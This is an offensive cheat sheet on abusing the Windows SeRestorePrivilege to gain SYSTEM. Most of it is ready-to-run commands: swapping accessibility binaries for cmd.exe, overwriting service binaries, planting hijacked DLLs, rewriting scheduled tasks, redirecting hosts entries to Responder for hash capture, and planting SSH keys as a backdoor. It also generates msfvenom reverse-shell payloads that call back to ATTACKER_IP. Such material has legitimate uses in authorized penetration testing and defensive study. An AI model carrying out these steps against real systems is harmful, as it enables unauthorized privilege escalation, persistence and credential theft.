Overview
SeRestorePrivilege grants write to any file/folder, bypassing NTFS ACLs (it also grants implicit WRITE_DAC/WRITE_OWNER). Effectively arbitrary write as SYSTEM: overwrite protected binaries, plant DLLs in System32, modify scheduled tasks.
Default on Administrators (elevated), Backup Operators, SYSTEM, and Server Operators on a DC.
Check if Enabled
whoami /priv | findstr /i "SeRestorePrivilege"
AdjustTokenPrivileges, see PowerShell method).
Replace Accessibility Binary — SYSTEM Shell at Login
Accessibility binaries launch as SYSTEM from the lock/login screen. Replace with cmd.exe.
copy C:\Windows\System32\utilman.exe C:\Windows\System32\utilman.exe.bak
copy C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe /Y
Win+L) → click Ease of Access → SYSTEM shell. Works pre-auth over RDP (xfreerdp3 /v:TARGET /cert:ignore).
Same technique for every accessibility binary:
| Binary | Trigger |
|---|
utilman.exe | Ease of Access button |
sethc.exe | Shift ×5 (Sticky Keys) — fires at RDP login |
Narrator.exe / Magnify.exe / osk.exe | Ease of Access menu |
DisplaySwitch.exe | Win+P |
.bak.
Defender/AMSI may flag overwriting these. Check first: sc query WinDefend. On 10 1809+, WRP may block copy — use the PowerShell backup-semantics method below.
Overwrite Service Binary
wmic service where "StartMode='Auto' AND StartName='LocalSystem'" get Name,PathName
sc qc VulnService
sc stop VulnService
copy "C:\Program Files\VulnService\app.exe" "C:\Program Files\VulnService\app.exe.bak"
copy shell.exe "C:\Program Files\VulnService\app.exe" /Y
sc start VulnService
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o shell.exe
DLL Hijack — System32 / PATH
Write a malicious DLL where a SYSTEM service expects one. Find missing DLLs with Procmon (Result = NAME NOT FOUND, ends .dll).
| Service | Missing DLL |
|---|
| IKEEXT | wlbsctrl.dll |
| SessionEnv | TSMSISrv.dll |
| NetMan | wlanhlp.dll |
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o wlbsctrl.dll
copy wlbsctrl.dll C:\Windows\System32\wlbsctrl.dll
sc stop IKEEXT && sc start IKEEXT
Scheduled Task Hijack
Task XML lives in C:\Windows\System32\Tasks. Overwrite a SYSTEM task’s command.
Get-ScheduledTask | Where-Object { $_.Principal.UserId -match 'SYSTEM' } | Select TaskName, TaskPath
$xml = [xml](Get-Content "C:\Windows\System32\Tasks\TargetTask")
$xml.Task.Actions.Exec.Command = "C:\Windows\Temp\shell.exe"
$xml.Save("C:\Windows\System32\Tasks\TargetTask")
schtasks /run /tn "TargetTask"
Modify hosts File
C:\Windows\System32\drivers\etc\hosts is normally protected. Redirect internal hostnames to a Responder host to capture Net-NTLMv2.
echo ATTACKER_IP fileserver.corp.local >> C:\Windows\System32\drivers\etc\hosts
sudo responder -I eth0 -v
Write SSH authorized_keys
If OpenSSH Server is installed (sc query sshd), plant your key for passwordless access.
echo ssh-ed25519 AAAA...key attacker@kali > C:\ProgramData\ssh\administrators_authorized_keys
icacls C:\ProgramData\ssh\administrators_authorized_keys /inheritance:r
icacls C:\ProgramData\ssh\administrators_authorized_keys /grant "BUILTIN\Administrators:F" /grant "NT AUTHORITY\SYSTEM:F"
ssh -i ~/.ssh/id_ed25519 administrator@TARGET
PowerShell Method (Backup Semantics)
When copy fails due to WRP, enable the privilege at runtime and write via .NET with FILE_FLAG_BACKUP_SEMANTICS (0x02000000). Enable the privilege with the standard AdjustTokenPrivileges P/Invoke (see the snippet on SeCreateTokenPrivilege), then:
$src = [System.IO.File]::OpenRead("C:\Windows\Temp\shell.exe")
$dst = [System.IO.FileStream]::new("C:\Windows\System32\target.exe",
[System.IO.FileMode]::Create, [System.IO.FileAccess]::Write,
[System.IO.FileShare]::None, 4096, [System.IO.FileOptions]0x02000000)
$src.CopyTo($dst); $dst.Close(); $src.Close()
Combine with SeBackupPrivilege
Backup Operators hold both → arbitrary read AND write. Dump SAM/NTDS.dit (read) then plant a backdoor (write). Read side documented in SeBackupPrivilege.
Quick Reference
| Technique | Target | Result |
|---|
Replace utilman.exe / sethc.exe | Lock / RDP login | SYSTEM shell |
| Overwrite service binary | SYSTEM service | SYSTEM on restart |
| Plant DLL (System32 / PATH) | Missing DLL | SYSTEM on service start |
| Modify scheduled task XML | System32\Tasks\* | SYSTEM on trigger |
Modify hosts | DNS redirect | Hash capture / MITM |
Write SSH authorized_keys | OpenSSH | Persistent access |
| Combine with SeBackup | SAM/NTDS + persistence | Full compromise |